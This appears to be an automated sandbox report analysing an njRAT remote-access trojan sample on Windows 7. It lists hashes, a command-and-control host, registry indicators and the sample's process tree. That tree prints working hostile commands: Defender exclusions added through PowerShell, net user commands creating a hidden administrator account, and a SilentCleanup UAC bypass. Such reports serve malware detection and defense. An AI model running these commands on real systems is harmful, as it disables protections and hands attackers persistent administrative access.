Analysis
-
max time kernel
140s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
01/09/2022, 06:51
Static task
static1
Behavioral task
behavioral1
Sample
6a6b2af0716cb8308dddae55dd325253.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
6a6b2af0716cb8308dddae55dd325253.exe
Resource
win10v2004-20220812-en
General
-
Target
6a6b2af0716cb8308dddae55dd325253.exe
-
Size
1.4MB
-
MD5
6a6b2af0716cb8308dddae55dd325253
-
SHA1
691556a82280d270bd0f763f1213b43c6c4c0b6d
-
SHA256
2cb6acd25b8d00468dd89658dc948836f92000e031085b6b3c798eb1504157df
-
SHA512
e517c7070e4c20eb16acc1dfa98c016a01a9fc66b1944c30e5270d3e616770804553140ff5b3b35c49c659b39e59cf999dc8fa5c00e9520bd57e6c9872d83f11
-
SSDEEP
24576:BxDQqQS0hvzxBbNLWYhMehi1VH/mUwz9md3Nz1OPSvu+1SHgYxw4d+q:BxQSEbBhMe+VOVBmfxfu+1SH1w40
Malware Config
Extracted
njrat
0.7NC
NYAN CAT
4Mekey.myftp.biz:2411
18951a269d7
-
reg_key
18951a269d7
-
splitter
@!#&^%$
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6a6b2af0716cb8308dddae55dd325253.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Extensions 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Extensions\exe = "1" 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions 6a6b2af0716cb8308dddae55dd325253.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools 6a6b2af0716cb8308dddae55dd325253.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6a6b2af0716cb8308dddae55dd325253.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6a6b2af0716cb8308dddae55dd325253.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Extensions 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Extensions\exe = "1" 6a6b2af0716cb8308dddae55dd325253.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\rF0bq16 = "C:\\Windows\\Microsoft.NET\\Framework\\b9xe33Q\\svchost.exe" 6a6b2af0716cb8308dddae55dd325253.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\rF0bq16 = "C:\\Windows\\Microsoft.NET\\Framework\\b9xe33Q\\svchost.exe" 6a6b2af0716cb8308dddae55dd325253.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ROCKS = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6a6b2af0716cb8308dddae55dd325253.exe\"" 6a6b2af0716cb8308dddae55dd325253.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6a6b2af0716cb8308dddae55dd325253.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 6a6b2af0716cb8308dddae55dd325253.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum 6a6b2af0716cb8308dddae55dd325253.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1832 set thread context of 832 1832 6a6b2af0716cb8308dddae55dd325253.exe 57 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe 6a6b2af0716cb8308dddae55dd325253.exe File opened for modification C:\Windows\Microsoft.NET\Framework\b9xe33Q 6a6b2af0716cb8308dddae55dd325253.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\w6qHIwG.raw 6a6b2af0716cb8308dddae55dd325253.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 2020 powershell.exe 1904 powershell.exe 1492 powershell.exe 1616 powershell.exe 1296 powershell.exe 1408 powershell.exe 2012 powershell.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 1832 6a6b2af0716cb8308dddae55dd325253.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1408 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1832 wrote to memory of 2020 1832 6a6b2af0716cb8308dddae55dd325253.exe 28 PID 1832 wrote to memory of 2020 1832 6a6b2af0716cb8308dddae55dd325253.exe 28 PID 1832 wrote to memory of 2020 1832 6a6b2af0716cb8308dddae55dd325253.exe 28 PID 1832 wrote to memory of 2020 1832 6a6b2af0716cb8308dddae55dd325253.exe 28 PID 1832 wrote to memory of 1496 1832 6a6b2af0716cb8308dddae55dd325253.exe 30 PID 1832 wrote to memory of 1496 1832 6a6b2af0716cb8308dddae55dd325253.exe 30 PID 1832 wrote to memory of 1496 1832 6a6b2af0716cb8308dddae55dd325253.exe 30 PID 1832 wrote to memory of 1496 1832 6a6b2af0716cb8308dddae55dd325253.exe 30 PID 1496 wrote to memory of 636 1496 net.exe 32 PID 1496 wrote to memory of 636 1496 net.exe 32 PID 1496 wrote to memory of 636 1496 net.exe 32 PID 1496 wrote to memory of 636 1496 net.exe 32 PID 1832 wrote to memory of 1528 1832 6a6b2af0716cb8308dddae55dd325253.exe 33 PID 1832 wrote to memory of 1528 1832 6a6b2af0716cb8308dddae55dd325253.exe 33 PID 1832 wrote to memory of 1528 1832 6a6b2af0716cb8308dddae55dd325253.exe 33 PID 1832 wrote to memory of 1528 1832 6a6b2af0716cb8308dddae55dd325253.exe 33 PID 1528 wrote to memory of 1412 1528 net.exe 35 PID 1528 wrote to memory of 1412 1528 net.exe 35 PID 1528 wrote to memory of 1412 1528 net.exe 35 PID 1528 wrote to memory of 1412 1528 net.exe 35 PID 1832 wrote to memory of 464 1832 6a6b2af0716cb8308dddae55dd325253.exe 36 PID 1832 wrote to memory of 464 1832 6a6b2af0716cb8308dddae55dd325253.exe 36 PID 1832 wrote to memory of 464 1832 6a6b2af0716cb8308dddae55dd325253.exe 36 PID 1832 wrote to memory of 464 1832 6a6b2af0716cb8308dddae55dd325253.exe 36 PID 464 wrote to memory of 2012 464 net.exe 38 PID 464 wrote to memory of 2012 464 net.exe 38 PID 464 wrote to memory of 2012 464 net.exe 38 PID 464 wrote to memory of 2012 464 net.exe 38 PID 1832 wrote to memory of 1320 1832 6a6b2af0716cb8308dddae55dd325253.exe 39 PID 1832 wrote to memory of 1320 1832 6a6b2af0716cb8308dddae55dd325253.exe 39 PID 1832 wrote to memory of 1320 1832 6a6b2af0716cb8308dddae55dd325253.exe 39 PID 1832 wrote to memory of 1320 1832 6a6b2af0716cb8308dddae55dd325253.exe 39 PID 1320 wrote to memory of 1324 1320 net.exe 41 PID 1320 wrote to memory of 1324 1320 net.exe 41 PID 1320 wrote to memory of 1324 1320 net.exe 41 PID 1320 wrote to memory of 1324 1320 net.exe 41 PID 1832 wrote to memory of 1056 1832 6a6b2af0716cb8308dddae55dd325253.exe 42 PID 1832 wrote to memory of 1056 1832 6a6b2af0716cb8308dddae55dd325253.exe 42 PID 1832 wrote to memory of 1056 1832 6a6b2af0716cb8308dddae55dd325253.exe 42 PID 1832 wrote to memory of 1056 1832 6a6b2af0716cb8308dddae55dd325253.exe 42 PID 1832 wrote to memory of 1904 1832 6a6b2af0716cb8308dddae55dd325253.exe 44 PID 1832 wrote to memory of 1904 1832 6a6b2af0716cb8308dddae55dd325253.exe 44 PID 1832 wrote to memory of 1904 1832 6a6b2af0716cb8308dddae55dd325253.exe 44 PID 1832 wrote to memory of 1904 1832 6a6b2af0716cb8308dddae55dd325253.exe 44 PID 1832 wrote to memory of 1492 1832 6a6b2af0716cb8308dddae55dd325253.exe 46 PID 1832 wrote to memory of 1492 1832 6a6b2af0716cb8308dddae55dd325253.exe 46 PID 1832 wrote to memory of 1492 1832 6a6b2af0716cb8308dddae55dd325253.exe 46 PID 1832 wrote to memory of 1492 1832 6a6b2af0716cb8308dddae55dd325253.exe 46 PID 1832 wrote to memory of 1616 1832 6a6b2af0716cb8308dddae55dd325253.exe 48 PID 1832 wrote to memory of 1616 1832 6a6b2af0716cb8308dddae55dd325253.exe 48 PID 1832 wrote to memory of 1616 1832 6a6b2af0716cb8308dddae55dd325253.exe 48 PID 1832 wrote to memory of 1616 1832 6a6b2af0716cb8308dddae55dd325253.exe 48 PID 1832 wrote to memory of 1296 1832 6a6b2af0716cb8308dddae55dd325253.exe 50 PID 1832 wrote to memory of 1296 1832 6a6b2af0716cb8308dddae55dd325253.exe 50 PID 1832 wrote to memory of 1296 1832 6a6b2af0716cb8308dddae55dd325253.exe 50 PID 1832 wrote to memory of 1296 1832 6a6b2af0716cb8308dddae55dd325253.exe 50 PID 1832 wrote to memory of 1408 1832 6a6b2af0716cb8308dddae55dd325253.exe 52 PID 1832 wrote to memory of 1408 1832 6a6b2af0716cb8308dddae55dd325253.exe 52 PID 1832 wrote to memory of 1408 1832 6a6b2af0716cb8308dddae55dd325253.exe 52 PID 1832 wrote to memory of 1408 1832 6a6b2af0716cb8308dddae55dd325253.exe 52 PID 1832 wrote to memory of 2012 1832 6a6b2af0716cb8308dddae55dd325253.exe 54 PID 1832 wrote to memory of 2012 1832 6a6b2af0716cb8308dddae55dd325253.exe 54 PID 1832 wrote to memory of 2012 1832 6a6b2af0716cb8308dddae55dd325253.exe 54 PID 1832 wrote to memory of 2012 1832 6a6b2af0716cb8308dddae55dd325253.exe 54 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6a6b2af0716cb8308dddae55dd325253.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe"C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe"1⤵
- UAC bypass
- Windows security bypass
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add2⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add3⤵PID:636
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add2⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators ADMIN~1 /add3⤵PID:1412
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup users "Admin" /add2⤵
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup users "Admin" /add3⤵PID:2012
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup administrators "Admin" /del2⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators "Admin" /del3⤵PID:1324
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I2⤵PID:1056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"2⤵PID:1772
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:832
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD564f2556b18e31b1a25f194931eebf4c0
SHA1fd8eed8149a90c7535a5f5f723ce18c8c9808d1f
SHA25659a44bc4130a029d0bf24605b9db94aee57b0b6805514e5f32b3a9ba18fda82f
SHA5125c253bf3aee393365d2108dc5a43f73b81771d45f4ee15ef33dedca90d1ada5b5a9789a14ed32e435d1bd02a6b1463c3ab019ebcfac028d100fbf6902f48c1d3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD564f2556b18e31b1a25f194931eebf4c0
SHA1fd8eed8149a90c7535a5f5f723ce18c8c9808d1f
SHA25659a44bc4130a029d0bf24605b9db94aee57b0b6805514e5f32b3a9ba18fda82f
SHA5125c253bf3aee393365d2108dc5a43f73b81771d45f4ee15ef33dedca90d1ada5b5a9789a14ed32e435d1bd02a6b1463c3ab019ebcfac028d100fbf6902f48c1d3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD564f2556b18e31b1a25f194931eebf4c0
SHA1fd8eed8149a90c7535a5f5f723ce18c8c9808d1f
SHA25659a44bc4130a029d0bf24605b9db94aee57b0b6805514e5f32b3a9ba18fda82f
SHA5125c253bf3aee393365d2108dc5a43f73b81771d45f4ee15ef33dedca90d1ada5b5a9789a14ed32e435d1bd02a6b1463c3ab019ebcfac028d100fbf6902f48c1d3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD564f2556b18e31b1a25f194931eebf4c0
SHA1fd8eed8149a90c7535a5f5f723ce18c8c9808d1f
SHA25659a44bc4130a029d0bf24605b9db94aee57b0b6805514e5f32b3a9ba18fda82f
SHA5125c253bf3aee393365d2108dc5a43f73b81771d45f4ee15ef33dedca90d1ada5b5a9789a14ed32e435d1bd02a6b1463c3ab019ebcfac028d100fbf6902f48c1d3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD564f2556b18e31b1a25f194931eebf4c0
SHA1fd8eed8149a90c7535a5f5f723ce18c8c9808d1f
SHA25659a44bc4130a029d0bf24605b9db94aee57b0b6805514e5f32b3a9ba18fda82f
SHA5125c253bf3aee393365d2108dc5a43f73b81771d45f4ee15ef33dedca90d1ada5b5a9789a14ed32e435d1bd02a6b1463c3ab019ebcfac028d100fbf6902f48c1d3